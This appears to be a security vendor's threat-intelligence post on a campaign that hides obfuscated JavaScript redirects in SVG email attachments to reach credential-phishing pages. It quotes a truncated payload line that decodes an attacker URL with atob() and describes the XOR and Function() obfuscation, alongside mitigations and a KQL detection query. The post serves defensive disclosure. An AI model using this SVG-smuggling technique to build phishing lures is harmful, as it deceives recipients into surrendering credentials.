SVG Smuggling – Image Embedded JavaScript Redirect Attacks

Introduction

Threat actors are increasingly leveraging Scalable Vector Graphics (SVG) files as a delivery vector for JavaScript-based redirect attacks. SVGs, commonly treated as harmless image formats, can contain embedded script elements. In these campaigns, adversaries embed obfuscated JavaScript within SVG files to initiate browser redirects at runtime.

The final redirect destinations are attacker-controlled infrastructure, with appended Base64-encoded strings used for victim tracking or correlation, while the payload is carefully structured for evasive purposes. The phishing themes vary between “ToDoList”, “Missed Call” and “Payment” related topics.

Technical Summary

• SVG files are used to bypass traditional file-based detection.
• Obfuscated JavaScript is embedded within <script><![CDATA[...]]></script> sections.
• The final malicious URL is assembled using atob() and executed via window.location.href.
• Email spoofing and impersonation are used to deliver the SVGs and increase the likelihood of user engagement.
• The campaign has evolved by adding Geofencing to the landing sites

Technical Breakdown

SVG with Obfuscated JavaScript

The core of the payload is delivered via a .svg file that contains a JavaScript block hidden within a CDATA section. The embedded code uses a static XOR key to decrypt a secondary payload at runtime. This decoded script reconstructs and executes a redirect command using the Function() constructor. The destination URL is built using atob() and includes a Base64-encoded string, likely functioning as a tracking token or victim identifier.

Example payload snippet:

window.location.href = atob(
  'aHR0cHM6Ly93dnJ6LmxmdGt2b2cubmV0L...'
) + "$<Base64_Identifier>";

Delivery Mechanism

Initial access is gained through a phishing campaign using spoofed or impersonated email senders. Attackers deliver the malicious SVG either as a direct file attachment or via a link to an externally hosted image that appears harmless. The emails observed use domains with weak or misconfigured SPF, DKIM, and DMARC records, enabling successful impersonation of trusted brands or individuals.

All victims share the following problems:

• No DKIM Records found
• DMARC Quarantine and Reject policy not enabled

Additionally, some targets also miss DMARC Records entirely.

In several cases, the threat actor used lookalike domains that closely resemble legitimate entities. Email subject lines and body content are minimal and engineered to reduce suspicion, with a simple call to action or image display prompting the user to open or preview the file in a browser. Once rendered, the SVG silently executes the embedded JavaScript.

Figure 1: The Recipient’s perspective

Attacker Infrastructure

Several domains have been identified as part of the campaign infrastructure. Occasionally, the domains follow a randomized or subdomain-based structure that makes detection via static filtering more difficult. Domain reputation is low or unknown, and hosting behaviour suggests short-lived campaign infrastructure that may be rotated regularly.

Figure 2: Typical M365 Credential Phishing (edited, removed branding)

Bypass Implications

This technique demonstrates how adversaries are shifting away from executable payloads and towards smuggling(HTML and now SVG) techniques. By embedding script logic into image formats and using trusted browser functions, the attack chain avoids triggering traditional behavioural or signature-based alerts. JavaScript execution is achieved without requiring file drops or macros, and evasion is further enhanced by distributing the payload via spoofed emails that may pass basic anti-spam filters.

This campaign stands out for its use of browser-native redirection without requiring user interaction or external downloads. It bridges the gap between traditional phishing and full malware delivery, making it stealthy and effective.

Comparative Analysis with Other SVG Campaigns

This attack is part of a broader trend of adversaries using unconventional files as vehicles for malicious JavaScript.

Earlier documented campaigns have used embedded script tags or hosted payloads on third-party services like Google Drive, this attack uses XOR-encrypted JavaScript inside the SVG, decrypted in the browser using `Function()` and `atob()`. The final URL redirect includes a Base64 string used for victim tracking. Unlike campaigns that deliver executables or archives (e.g., ZIP or JAR files), this method avoids dropping any files, helping it bypass traditional EDR and AV tools.

Victimology

The observed targets of this campaign fall into B2B Service Providers, including the ones handling valuable Corporate Data regularly, including Financial and Employee data, Utilities, Software-as-a-Service providers that are great social engineering targets as they expect to receive a high volume of emails.

Delivery is also more targeted. The attacker sends the malicious SVG as an attachment from spoofed or lookalike domains. The email typically lacks content, using a minimal format to avoid detection and provoke curiosity or interaction.

Mitigation Recommendations

• Microsoft Defender for Office 365:
  • Enable Safe Links & Safe Attachments for URL and attachment protection.
  • Create Anti-Phishing Policies and block specific domains
  • Enable Zero-hour Auto Purge (ZAP) for post-delivery phishing detection.
  • On the Phishing threshold & protection page, configure the following settings(Standard/Aggressive)- Configure anti-phishing policies in Microsoft Defender for Office 365 – Microsoft Defender for Office 365
• Email Hardening:
  • Implement enforcement-mode DMARC policies for your domains with SPF/DKIM alignment.
  • Block SVG attachments or use content disarm and reconstruction (CDR) on inbound email.
  • Monitor for abuse of lookalike domains impersonating your brand.
• File Inspection:
  • Integrate deep content inspection into your email and endpoint solutions.
  • Flag SVG files containing script logic and encoding routines.
• End-User Awareness:
  • Train users to treat unsolicited attachments, even images, with caution.
  • Include SVG-based phishing simulation in security awareness programs.

Detection

The Ontinue Threat Detection team shared the following broadly applicable query to find instances of Suspicious SVG files:

let lookback = 7d;
let SVGRegex = @"(?i).*\.svg(\..*)?$";
let Browsers = dynamic([ "chrome.exe", "msedge.exe", "firefox.exe", "opera.exe", "brave.exe" ]);
let SuspiciousSVGEmails = materialize(
    EmailAttachmentInfo
    | where TimeGenerated > ago(lookback)
    | where FileType == "xml" and FileName matches regex SVGRegex
    | join kind=inner (
        EmailEvents
        | where TimeGenerated > ago(lookback)
    ) on NetworkMessageId
    | extend RecipientEmailAddress = tolower(RecipientEmailAddress)
    | summarize by NetworkMessageId, Subject, FileName, RecipientEmailAddress
);
let SuspiciousSVGFileNames = materialize(
    SuspiciousSVGEmails
    | summarize by FileName
);
DeviceProcessEvents
| where TimeGenerated > ago(lookback)
| where ProcessCommandLine has_any (SuspiciousSVGFileNames)
| where FolderPath has_any (Browsers)
| extend AccountUpn = tolower(AccountUpn)
| extend SvgCLIFileName=extract(@"([^\\]+\.svg(?:\.\w+)*)",1,ProcessCommandLine)
| join kind=inner SuspiciousSVGEmails on $left.AccountUpn == $right.RecipientEmailAddress and $left.SvgCLIFileName == $right.FileName

Indicators of Compromise

threat-intel-iocs/Public/2025-07-10-IOCs-SVG-Smuggling-Image-Embedded-JavaScript-Redirect-Attacks.md at main · ontinue-research/threat-intel-iocs

Closing Thoughts

This campaign highlights a creative pivot in attacker methodology, using benign file formats to hide malicious logic and evade established detection controls. SVGs provide an effective delivery vehicle for client-side JavaScript, and spoofed emails reduce the friction required for successful execution. Security teams should prioritize the detection of dynamic script activity in non-traditional file types and review their controls for email-based file delivery.

Need Assistance?

Ontinue can help you protect your environment against these, and other threats.